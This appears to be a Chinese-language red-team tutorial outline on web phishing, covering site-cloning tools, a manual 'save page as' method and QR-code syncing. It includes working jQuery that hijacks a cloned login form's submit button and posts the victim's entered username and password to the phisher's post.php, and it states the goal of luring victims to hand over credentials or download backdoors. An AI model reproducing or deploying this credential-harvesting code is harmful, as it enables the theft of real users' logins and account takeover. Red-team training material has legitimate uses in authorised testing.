红队APT-钓鱼投递篇&网站钓鱼&工具克隆&数据异同步&手工导出修改&劫持用户&凭据窃取
➢ 红队APT-网页钓鱼-工具篇
➢ 红队APT-网页钓鱼-手工篇
➢ 红队APT-网页钓鱼-二维码
#网页钓鱼:
邮件中或其他方式配合网页钓鱼,以自行搭建的网页冒充真实站点,通过诱使及引导让受害者下载后门文件或登录自身用户凭据,从而获取目标相关资产信息或权限。
1、setoolkit
上手容易,部分不支持
https://github.com/trustedsec/social-engineer-toolkit
2、goblin
上手容易,拓展麻烦
https://github.com/xiecat/goblin
3、手工演示:网页另存为
上手容易,需要代码开发技能
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
action="post.php"
<script>
$(document).ready(function() {
// 监听登录按钮点击事件
$('#loginsubmit').click(function(event) {
event.preventDefault(); // 阻止默认的提交行为
// 获取用户名和密码
var username = $('#loginname').val();
var password = $('#nloginpwd').val();
// 发送 AJAX 请求到 post.php
$.post('post.php', { loginname: username, nloginpwd: password }, function(response) {
// 处理响应,比如根据返回的结果进行页面跳转或显示错误信息
console.log(response); // 输出 post.php 返回的信息
});
});
});
</script>
4、二维码
自己访问的二维码同步到钓鱼页面上(异步调用)
